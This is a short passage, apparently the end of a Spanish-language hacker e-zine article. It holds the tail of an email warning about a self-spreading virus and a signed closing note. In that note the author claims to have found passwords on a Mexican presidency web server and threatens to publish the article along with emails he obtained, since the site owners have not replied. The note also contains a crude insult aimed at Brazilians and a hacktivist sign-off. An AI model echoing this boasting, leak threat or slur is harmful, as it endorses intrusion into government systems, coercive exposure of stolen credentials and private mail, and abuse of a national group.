NO IMPORTA SI SE LOS MANDA ALGUIEN CONOCIDO, ESTE VIRUS BLOQUEA LA . COMPUTADORA Y SE AUTO MANDA A TODOS LOS DESTINATARIOS DE LA LIBRETA DE DIRECCIONES. --------------68EDA2B8A569812A6DD1AA9A-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= NOTA: ESTE ARTICULO FUE ENVIADO A LA GENTE RESPONSABLE DE WWW.PRESIDENCIA.GOB.MX ANTES DE SER PUBLICADO, ESTO ES POR SI NO CONOCEN AUN TODAS LAS FALLAS, HE ENVIADO UN ESCRITO MUY BREVE Y PASSWORDS ENCONTRADOS EN SU SERVIDOR , ASI KE YO ESPERO KE CORRIJAN LA FALLAS AKI EXPUESTAS, AUN NO HE RECIBIDO RESPUESTA ASI KE ESTE TEXTO LO PUBLICARE JUNTO CON MAILS KE HE OBTENIDO, POR ULTIMO AGREGO ESTA LINEA... "FUCK ASSHOLE BRAZILIAN" ATTE: alt3kx! Greet to: dr_fdisk^ _0x90_ x-ploit Hacktivism! rUL3Z! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=